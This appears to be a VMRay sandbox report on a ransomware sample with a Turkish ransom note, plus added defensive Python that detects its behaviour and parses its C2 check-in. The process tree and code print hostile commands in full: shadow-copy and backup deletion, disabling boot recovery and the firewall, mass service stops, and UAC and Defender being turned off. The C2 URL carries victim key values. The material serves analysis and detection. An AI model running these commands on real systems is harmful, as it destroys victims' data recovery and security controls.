VMRay Analyzer Report for Sample #410028
VMRay Analyzer 3.1.2

Network indicator: URI mamo434376.tk, resolved to address 185.130.56.82
Process tree

Columns: export index, PID, parent PID, image, command line. Every process ran with working directory C:\Users\FD1HVy\Desktop\. starter.exe was loaded from c:\users\fd1hvy\desktop\starter.exe and the dropped svchost.exe from c:\users\fd1hvy\appdata\local\temp\svchost.exe (a copy in %TEMP% named after the Windows service host, not the real one). Every other image was loaded from c:\windows\syswow64\ (wmic.exe from c:\windows\syswow64\wbem\) even where the command line names System32: that is WoW64 file-system redirection, which shows the sample is a 32-bit executable. Index numbers are as exported and are not contiguous. PIDs are reused during the run (3160, 3340, 4188 and 4580 each belong to two different processes), so the index, not the PID, identifies a process, and a parent PID refers to whichever process held it at the time.

  #   PID   PPID  Image         Command line
  1   3160  2144  starter.exe   "C:\Users\FD1HVy\Desktop\Starter.exe"
  4   3340  3160  svchost.exe   "C:\Users\FD1HVy\AppData\Local\Temp\svchost.exe"
  5   4032  3340  cmd.exe       "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable
  7   1176  3340  cmd.exe       "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
  8   3980  3340  cmd.exe       "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
 11   3736  3340  cmd.exe       "C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
 12   3160  3340  cmd.exe       "C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
 13   3400  3340  cmd.exe       "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
 17   4100  1176  vssadmin.exe  vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
 18   4108  4032  netsh.exe     netsh firewall set opmode disable
 19   4116  3400  vssadmin.exe  vssadmin delete shadows /all /quiet
 20   4128  3160  net.exe       net stop DbxSvc
 21   4144  3736  taskkill.exe  taskkill /f /im sql.*
 22   4152  3980  vssadmin.exe  vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
 23   4188  4128  net1.exe      C:\WINDOWS\system32\net1 stop DbxSvc
 24   4252  3160  net.exe       net stop OracleXETNSListener
 25   4280  4252  net1.exe      C:\WINDOWS\system32\net1 stop OracleXETNSListener
 26   4332  3160  net.exe       net stop OracleServiceXE
 27   4364  4332  net1.exe      C:\WINDOWS\system32\net1 stop OracleServiceXE
 29   4408  3160  net.exe       net stop AcrSch2Svc
 30   4420  3340  notepad.exe   "C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\FD1HVy\Desktop\Lütfen Beni Oku!!!.log
 31   4428  3340  cmd.exe       "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
 33   4464  4408  net1.exe      C:\WINDOWS\system32\net1 stop AcrSch2Svc
 34   4484  3400  wmic.exe      wmic shadowcopy delete
 35   4520  3160  net.exe       net stop AcronisAgent
 36   4532  4520  net1.exe      C:\WINDOWS\system32\net1 stop AcronisAgent
 37   4544  4428  vssadmin.exe  vssadmin delete shadows /all /quiet
 38   4556  3736  taskkill.exe  taskkill /f /im winword.*
 39   4568  3160  net.exe       net stop Apache2.4
 40   4580  4568  net1.exe      C:\WINDOWS\system32\net1 stop Apache2.4
 41   4612  3160  net.exe       net stop SQLWriter
 42   4624  4612  net1.exe      C:\WINDOWS\system32\net1 stop SQLWriter
 44   4696  3160  net.exe       net stop MSSQL$SQLEXPRESS
 46   4716  4696  net1.exe      C:\WINDOWS\system32\net1 stop MSSQL$SQLEXPRESS
 48   4744  4428  wmic.exe      wmic shadowcopy delete
 49   4756  3736  taskkill.exe  taskkill /f /im wordpad.*
 50   4764  3160  net.exe       net stop MSSQLServerADHelper100
 51   4780  4764  net1.exe      C:\WINDOWS\system32\net1 stop MSSQLServerADHelper100
 52   4808  3160  net.exe       net stop MongoDB
 53   4828  4808  net1.exe      C:\WINDOWS\system32\net1 stop MongoDB
 54   4920  3160  net.exe       net stop SQLAgent$SQLEXPRESS
 55   4936  4920  net1.exe      C:\WINDOWS\system32\net1 stop SQLAgent$SQLEXPRESS
 56   4972  3160  net.exe       net stop SQLBrowser
 57   4984  4972  net1.exe      C:\WINDOWS\system32\net1 stop SQLBrowser
 58   5000  3736  taskkill.exe  taskkill /f /im outlook.*
 59   5028  3160  net.exe       net stop CobianBackup11
 60   5052  5028  net1.exe      C:\WINDOWS\system32\net1 stop CobianBackup11
 61   5068  3736  taskkill.exe  taskkill /f /im thunderbird.*
 62   5084  3160  net.exe       net stop cbVSCService11
 63   5108  5084  net1.exe      C:\WINDOWS\system32\net1 stop cbVSCService11
 64   2828  3736  taskkill.exe  taskkill /f /im oracle.*
 65   2320  3160  net.exe       net stop QBCFMontorService
 66   4188  2320  net1.exe      C:\WINDOWS\system32\net1 stop QBCFMontorService
 67   3940  3736  taskkill.exe  taskkill /f /im excel.*
 69   4336  3160  net.exe       net stop QBVSS
 70   1032  3736  taskkill.exe  taskkill /f /im onenote.*
 71   3352  4336  net1.exe      C:\WINDOWS\system32\net1 stop QBVSS
 72   4452  3736  taskkill.exe  taskkill /f /im virtualboxvm.*
 73   3496  3736  taskkill.exe  taskkill /f /im node.*
 74   4376  3736  taskkill.exe  taskkill /f /im QBW32.*
 75   4580  3736  taskkill.exe  taskkill /f /im WBGX.*
 76   4616  3736  taskkill.exe  taskkill /f /im Teams.*
 77   3340  3736  taskkill.exe  taskkill /f /im Flow.*

Reading the tree: starter.exe (#1) drops svchost.exe into %TEMP% and runs it (#4). svchost.exe then launches six cmd.exe /C one-shots: disable the firewall through the legacy netsh firewall context (#5); shrink the shadow-copy storage to 401 MB and grow it back to unbounded (#7, #8; shrinking the store makes Windows discard the shadow copies it can no longer hold); kill fourteen document, database and collaboration processes (#11); stop sixteen backup and database services (#12; QBCFMontorService is spelled that way by the sample); and delete shadow copies, backup catalogs and the boot recovery options (#13). It then opens the ransom note in Notepad (#30; "Lütfen Beni Oku" is Turkish for "Please Read Me") and runs the recovery-wipe chain a second time (#31). #11 fans out into the taskkill.exe children, #12 into net.exe children that each spawn net1.exe, and #13 and #31 into vssadmin.exe and wmic.exe. No bcdedit.exe or wbadmin.exe process appears in this export (which omits some indices), so it records no direct evidence that the bcdedit and wbadmin parts of that chain ran; the vmray_disable_startup_repair match below is keyed on the cmd.exe command line, not on an observed bcdedit.exe process.
Other artifacts

Mutex
  OneCopyMutex (the name suggests a single-instance guard; see vmray_install_ipc_endpoint below)

DNS record
  mamo434376.tk

Registry keys, with values as exported. The export does not say which keys were only read and which were written; the VTI matches below attribute the UAC, Task Manager, Defender and wallpaper changes to the keys marked with an asterisk.
  HKCU  Software\Embarcadero\Locales
  HKLM  Software\Embarcadero\Locales
  HKCU  Software\CodeGear\Locales
  HKLM  Software\CodeGear\Locales
  HKCU  Software\Borland\Locales
  HKCU  Software\Borland\Delphi\Locales
        These six are the locale-override lookups of the Delphi / C++Builder VCL runtime and identify the toolchain the binary was built with.
  HKLM  SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System *  (exported twice with identical values)
        ConsentPromptBehaviorAdmin = 5, ConsentPromptBehaviorUser = 3, dontdisplaylastusername = 0, EnableInstallerDetection = 1, EnableLUA = 0, EnableSecureUIAPaths = 1, EnableUIADesktopToggle = 5, EnableVirtualization = 1, FilterAdministratorToken = 0, PromptOnSecureDesktop = 1, scforceoption = 0, shutdownwithoutlogon = 1, undockwithoutlogon = 1, ValidateAdminCodeSignatures = 0 (all REG_DWORD); legalnoticecaption and legalnoticetext (REG_SZ, no data recorded)
        EnableLUA = 0 switches UAC off altogether (it takes effect after a reboot) rather than merely silencing the consent prompt.
  HKLM  SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
        MS Shell Dlg 2 (GUI font substitution lookup)
  HKCU  Control Panel
  HKCU  Control Panel\desktop *
        Wallpaper = C:\Users\FD1HVy\@Adsız@.jpg (REG_SZ; "Adsız" is Turkish for "untitled")
        TileWallpaper = 0 (REG_SZ)
  HKLM  SOFTWARE\Policies\Microsoft\Windows Defender *
        DisableAntiSpyware = 1 (REG_DWORD), the policy value that turns Windows Defender Antivirus off
  HKCU  Software\Microsoft\Windows\CurrentVersion\Policies\System *
        DisableTaskMgr = 1 (REG_DWORD), later reset to DisableTaskMgr = 0: Task Manager is blocked during the run and released afterwards
  HKCU  Software\Policies\Microsoft\Windows\System
  HKLM  Software\Microsoft\Command Processor and HKCU Software\Microsoft\Command Processor
        DisableUNCCheck, EnableExtensions, DelayedExpansion, DefaultColor, CompletionChar, PathCompletionChar, AutoRun, queried once per cmd.exe instance. These are cmd.exe's own start-up reads, and no data is recorded for AutoRun, so they are not evidence of Command Processor AutoRun persistence.
  HKLM  SOFTWARE\Microsoft\NetSh (read by netsh.exe)
  HKLM  SOFTWARE\Microsoft\Wbem\CIMOM
        Logging, Logging Directory, Log File Max Size (read by wmic.exe)

Console handles
  STD_INPUT_HANDLE, STD_OUTPUT_HANDLE and STD_ERROR_HANDLE, opened by each of the cmd.exe, net.exe, net1.exe, vssadmin.exe, wmic.exe, netsh.exe and taskkill.exe children; console plumbing, not an indicator.
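The process tree and the registry artifacts above are the raw material a detection engineer turns into rules. The following Python is added here as an example; it is not part of the VMRay report or of any VMRay tooling. It re-implements checks of the kind behind this report's VTI matches over constructed input copied from the report: each cmd.exe /C one-shot is split into its individual commands and matched against patterns for shadow-copy deletion, shadow-storage resizing, boot-recovery tampering, backup-catalog deletion, firewall disabling, stopping backup/database services and killing document/database processes; the registry values are checked for the UAC, Defender, Task Manager and wallpaper changes. The rule names, the watch lists and the verdict threshold are this example's own choices. Because the export does not mark registry reads versus writes, the registry entries are treated as writes, as the VTI matches imply.

```python
import re

# Constructed sample input: command lines from the process tree in this report.
# The taskkill and net stop chains are shortened; the others are verbatim.
PROCESS_CMDLINES = [
    '"C:\\Windows\\System32\\cmd.exe" /C netsh firewall set opmode disable',
    '"C:\\Windows\\System32\\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB',
    '"C:\\Windows\\System32\\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded',
    '"C:\\Windows\\System32\\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im outlook.* & taskkill /f /im QBW32.*',
    '"C:\\Windows\\System32\\cmd.exe" /C net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop AcronisAgent & net stop QBVSS',
    '"C:\\Windows\\System32\\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete'
    ' & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no'
    ' & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup -keepversions:0',
    '"C:\\WINDOWS\\system32\\NOTEPAD.EXE" C:\\Users\\FD1HVy\\Desktop\\Lütfen Beni Oku!!!.log',
]

# Constructed sample input: registry values from the artifact list, treated as writes
# (the export does not mark reads versus writes). Tuples are (hive, key, value, data).
REGISTRY_WRITES = [
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", 0),
    ("HKLM", r"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", 1),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", 1),
    ("HKCU", r"Control Panel\desktop", "Wallpaper", r"C:\Users\FD1HVy\@Adsız@.jpg"),
]

# Rule names are this example's own labels, not VMRay VTI identifiers.
CMD_RULES = [
    ("shadow_copies_deleted",
     re.compile(r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)\b", re.I)),
    ("shadow_storage_resized",  # shrinking the store makes Windows discard existing shadow copies
     re.compile(r"\bvssadmin(\.exe)?\s+resize\s+shadowstorage\b", re.I)),
    ("boot_recovery_disabled",
     re.compile(r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("backup_catalog_deleted",
     re.compile(r"\bwbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup|backup)\b", re.I)),
    ("firewall_disabled",
     re.compile(r"\bnetsh(\.exe)?\s+firewall\s+set\s+opmode\s+disable\b", re.I)),
]
# Services and image names that ransomware stops so that open database and document
# files can be overwritten; the watch lists are drawn from this report's command lines.
WATCHED_SERVICES = re.compile(r"^(MSSQL|SQLAgent|SQLWriter|SQLBrowser|MongoDB|Oracle|Acr|Apache|Cobian|cbVSC|QB|DbxSvc)", re.I)
WATCHED_IMAGES = re.compile(r"^(sql|oracle|winword|excel|outlook|onenote|thunderbird|wordpad|QBW32)", re.I)
SERVICE_STOP = re.compile(r"\bnet(1|\.exe)?\s+stop\s+(\S+)", re.I)
TASK_KILL = re.compile(r"\btaskkill(\.exe)?\s+/f\s+/im\s+(\S+)", re.I)
CMD_PREFIX = re.compile(r'^"[^"]*\\cmd\.exe"\s+/c\s+', re.I)


def split_chain(cmdline):
    """Strip the cmd.exe /C prefix and split an & chain into its individual commands."""
    body = CMD_PREFIX.sub("", cmdline)
    return [part.strip() for part in body.split("&") if part.strip()]


def scan_cmdline(cmdline):
    """Return (rule, evidence) pairs for one process command line."""
    hits = []
    for cmd in split_chain(cmdline):
        hits.extend((name, cmd) for name, pattern in CMD_RULES if pattern.search(cmd))
        stop = SERVICE_STOP.search(cmd)
        if stop and WATCHED_SERVICES.match(stop.group(2)):
            hits.append(("backup_or_db_service_stopped", cmd))
        kill = TASK_KILL.search(cmd)
        if kill and WATCHED_IMAGES.match(kill.group(2)):
            hits.append(("document_or_db_process_killed", cmd))
    return hits


def scan_registry(writes):
    """Return (rule, evidence) pairs for the policy and desktop changes seen in this report."""
    hits = []
    for hive, key, value, data in writes:
        k, v, evidence = key.lower(), value.lower(), f"{hive}\\{key}\\{value} = {data}"
        if k.endswith(r"policies\system") and v == "enablelua" and data == 0:
            hits.append(("uac_disabled", evidence))
        elif k.endswith(r"policies\microsoft\windows defender") and v == "disableantispyware" and data == 1:
            hits.append(("defender_disabled_by_policy", evidence))
        elif k.endswith(r"policies\system") and v == "disabletaskmgr" and data == 1:
            hits.append(("task_manager_disabled", evidence))
        elif k.endswith(r"control panel\desktop") and v == "wallpaper":
            hits.append(("wallpaper_replaced", evidence))
    return hits


# Techniques that remove the victim's own recovery options, and those that release locked data files.
RECOVERY_INHIBITION = {"shadow_copies_deleted", "shadow_storage_resized",
                       "boot_recovery_disabled", "backup_catalog_deleted"}
DATA_RELEASE = {"backup_or_db_service_stopped", "document_or_db_process_killed"}


def triage(cmdlines, writes):
    """Aggregate findings; ransomware-like when at least two recovery-inhibition techniques
    are combined with releasing locked data files (the threshold is this example's own)."""
    findings = [hit for cmd in cmdlines for hit in scan_cmdline(cmd)] + scan_registry(writes)
    techniques = {name for name, _ in findings}
    verdict = len(techniques & RECOVERY_INHIBITION) >= 2 and bool(techniques & DATA_RELEASE)
    return {"findings": findings, "techniques": sorted(techniques), "ransomware_like": verdict}


if __name__ == "__main__":
    result = triage(PROCESS_CMDLINES, REGISTRY_WRITES)
    for name, evidence in result["findings"]:
        print(f"{name:32} {evidence}")
    print("verdict:", "ransomware-like" if result["ransomware_like"] else "inconclusive")
```

Splitting on & is adequate for these one-shots but breaks on quoted arguments that contain an ampersand; a production rule should either tokenise with cmd.exe's quoting rules or match on the child processes themselves (vssadmin.exe, wmic.exe, net1.exe, taskkill.exe), which is also the only place this export proves a command actually ran: the bcdedit and wbadmin parts of the chain match on the cmd.exe command line but have no child process in the tree.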
Analyzed Sample #410028 (Malware Artifacts)

Sample-ID: #410028
Job-ID: #1012874
Submission-ID: #2606182
This sample was analyzed by VMRay Analyzer 3.1.2 on a Windows 10 Redstone 2 system.
VTI score: 100 (based on VTI database version 3.5)

Metadata of sample file #410028
  File name: 16b829c1601755a0843c35da54209e923ded6d9ced16506e0831d568717bd8aeexe
  MD5:       c7bbff934bd89ad39e98e2746c6e8af2
  SHA1:      01623c01bd7587e98c35f7f8119703c85dbb6a24
  SHA256:    16b829c1601755a0843c35da54209e923ded6d9ced16506e0831d568717bd8ae

Metadata of analysis for Job-ID #1012874
  VM configuration: win10_64_rs2, x86 64-bit, Windows 10 Redstone 2, build 10.0.15063.540 (f6f48955-5489-4b24-b4df-942361f0730d)
  Analysis user: FD1HVy
  Further fields whose labels were not preserved in the export: False, Timeout, True, 240.105, NQDPDE (listed twice)

VTI rule matches (category, score, rule id, finding)

Anti Analysis, 2/5, vmray_dynamic_api_usage_by_api
  Resolves an unusually high number of APIs dynamically, possibly to evade static detection.
OS, 5/5, vmray_disable_uac_dialog_by_registry
  Disables the UAC dialog via the registry (bypasses Windows User Account Control). The registry artifacts above show EnableLUA = 0, which disables UAC entirely after the next reboot.
Process, 1/5, vmray_create_process_with_hidden_window
  The process "C:\Users\FD1HVy\AppData\Local\Temp\svchost.exe" starts with a hidden window.
Process, 1/5, vmray_install_ipc_endpoint
  Creates mutex "OneCopyMutex" (creates system object).
Process, 1/5, vmray_create_process_with_hidden_window
  The process "cmd.exe" starts with a hidden window.
File System, 1/5, vmray_create_file_in_os_dir
  Creates file "C:\Windows\System32\drivers\etc\host" in the OS directory (modifies operating system directory). The name is recorded as "host", not the system "hosts" file.
OS, 4/5, vmray_disable_taskmgr_by_registry
  Disables the Task Manager (disables a crucial system tool).
Network Connection, 1/5, vmray_request_dns_by_name
  Resolves host name "mamo434376.tk" (performs DNS request).
OS, 3/5, vmray_disable_startup_repair
  Disables startup repair by executing "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup (disables a Windows system tool). The match is keyed on the cmd.exe command line; no bcdedit.exe or wbadmin.exe child process appears in the process tree above.
File System, 4/5, vmray_modify_user_files
  Modifies the content of multiple user files, an indicator of an encryption attempt.
File System, 4/5, vmray_rename_user_files
  Renames multiple user files, an indicator of an encryption attempt.
OS, 2/5, vmray_set_desktop_wallpaper_by_api
  Changes the desktop wallpaper; the file name in the rule text is empty (""). The registry artifacts above record Wallpaper = C:\Users\FD1HVy\@Adsız@.jpg.
File System, 1/5, vmray_create_file_in_os_dir
  Creates file "C:\WINDOWS\Lütfen Beni Oku!!!.log" ("Please Read Me!!!", the ransom note) in the OS directory.
OS, 4/5, vmray_modify_windows_backup_settings
  Deletes Windows volume shadow copies (modifies Windows automatic backups).
File System, 1/5, vmray_create_many_files
  Creates an unusually large number of files.
Process, 2/5, vmray_create_many_processes
  An above-average number of processes was monitored.
Local AV, 5/5, vmray_av_malicious_match
  Local AV detected the dropped file "C:\Users\FD1HVy\AppData\Local\Temp\svchost.exe" as "GenPack:Generic.Malware.FHTk.1562EF97" (heuristic scan).
Local AV, 5/5, vmray_av_malicious_match
  Local AV detected a memory dump of process "starter.exe" as "GenPack:Generic.Malware.FHTk.1562EF97" (heuristic scan).
Local AV, 5/5, vmray_av_malicious_match
  Local AV detected a memory dump of process "svchost.exe" as "Gen:Trojan.Heur.np1@rOPUVCni" (heuristic scan).
Local AV, 5/5, vmray_av_malicious_match
  Local AV detected a memory dump of process "svchost.exe" as "GenPack:Generic.Malware.FHTk.813023F0" (heuristic scan).
Network Connection, 1/5, vmray_tcp_in_connection
  Incoming TCP connection from host "185.130.56.82:80".
Network Connection, 1/5, vmray_tcp_out_connection
  Outgoing TCP connection to host "185.130.56.82:80".
Network Connection, 1/5, vmray_establish_http_connection
  URL "http://mamo434376.tk/tarih.php" ("tarih" is Turkish for "date").
Network Connection, 1/5, vmray_establish_http_connection
  URL "http://mamo434376.tk/edata.php?info=ID:__HkTkJDzxbp___Key1:___HIUCWKYieiXAkspdTrBBiVlJiovlAnlSYJjGGGaXLGUyUSVAiYSkBljAwdYkJXgUJydhSfXgOMTnyjFUygbRflkHRFGDGwuBULTiZzDbSNmUdoSUpENpdmNfcbTUXsZVXPiR____Key2:___wBejBrIyRVVgRoucMLBTlzRmUFzNwqxErfuqiIUamcGslwVoLhtDcqFiFdEvVRNwHyWgKUaEjSUpirqIBdaDKisuXVcPYIcKVrnuIqeApwKYjAEURxMzJhMvrtvDRRHZqzbc____Tarih:___07/01/2020". This check-in goes out in clear-text HTTP on port 80 and carries an ID, two values labelled Key1 and Key2 and a date; the report does not say what the Key values encode, so if a victim's proxy logged this request the values should be preserved as-is.
Network Connection, 2/5, vmray_install_tcp_server
  TCP server listens on port "49679" (sets up a server that accepts incoming connections).
PE, 1/5, vmray_drop_pe_file
  Drops file "C:\Users\FD1HVy\AppData\Local\Temp\svchost.exe".
PE, 1/5, vmray_execute_dropped_pe_file
  Executes dropped file "C:\Users\FD1HVy\AppData\Local\Temp\svchost.exe".
Static, 1/5, vmray_static_analysis_parser_error
  The static engine was unable to completely parse the analyzed file C:\Users\FD1HVy\Desktop\Starter.exe (unparsable sections in file).
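The edata.php request above is the sample's check-in. As an added example (not VMRay's code and not the sample's), the following Python parses that URL exactly as the report logged it into its labelled fields and profiles the two Key values structurally, without assuming what they encode. The field labels are the sample's own ("Tarih" is Turkish for "date"); the looks_like_beacon() check is this example's own heuristic for matching the same request shape in proxy logs regardless of the host name.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The check-in request exactly as this report logged it (vmray_establish_http_connection).
BEACON_URL = (
    "http://mamo434376.tk/edata.php?info=ID:__HkTkJDzxbp___Key1:___"
    "HIUCWKYieiXAkspdTrBBiVlJiovlAnlSYJjGGGaXLGUyUSVAiYSkBljAwdYkJXgUJydhSfXgOMTnyjFUygbRflkHRFGDGwuBULTiZzDbSNmUdoSUpENpdmNfcbTUXsZVXPiR"
    "____Key2:___"
    "wBejBrIyRVVgRoucMLBTlzRmUFzNwqxErfuqiIUamcGslwVoLhtDcqFiFdEvVRNwHyWgKUaEjSUpirqIBdaDKisuXVcPYIcKVrnuIqeApwKYjAEURxMzJhMvrtvDRRHZqzbc"
    "____Tarih:___07/01/2020"
)

# A field is `Label:` followed by a run of underscores and an underscore-free value;
# the sample separates fields with two to four underscores and uses none inside values.
FIELD = re.compile(r"(?P<label>[A-Za-z0-9]+):_+(?P<value>[^_]+)")
EXPECTED_LABELS = {"ID", "Key1", "Key2", "Tarih"}  # Tarih is Turkish for "date"


def parse_beacon(url):
    """Split the edata.php request into host, path and the labelled fields of info=."""
    parts = urlsplit(url)
    info = parse_qs(parts.query, keep_blank_values=True).get("info", [""])[0]
    fields = {m.group("label"): m.group("value") for m in FIELD.finditer(info)}
    return {"host": parts.hostname, "path": parts.path, "fields": fields}


def key_profile(fields):
    """Describe Key1/Key2 structurally without guessing at what they encode."""
    k1, k2 = fields.get("Key1", ""), fields.get("Key2", "")
    return {
        "key1_len": len(k1),
        "key2_len": len(k2),
        "same_length": bool(k1) and len(k1) == len(k2),
        "alphabetic_only": k1.isalpha() and k2.isalpha(),
    }


def looks_like_beacon(url):
    """Heuristic for proxy-log matching (this example's own): same script name and the same
    four labelled fields, so a re-registered C2 domain with the same panel still matches."""
    parsed = parse_beacon(url)
    return parsed["path"].endswith("/edata.php") and set(parsed["fields"]) == EXPECTED_LABELS


if __name__ == "__main__":
    parsed = parse_beacon(BEACON_URL)
    print(parsed["host"], parsed["path"])
    for label, value in parsed["fields"].items():
        print(f"{label:6} {value if len(value) <= 40 else value[:40] + '...'}")
    print(key_profile(parsed["fields"]))
    print("beacon:", looks_like_beacon(BEACON_URL))
```

Both Key values come out as alphabetic strings of equal length, which is worth recording but not interpreting: the report gives no indication whether they are keys, key material or an encoding of something else. The date is ambiguous as logged (07/01/2020 is 7 January in the Turkish day/month convention but 1 July read month-first), so the parser returns it verbatim rather than converting it.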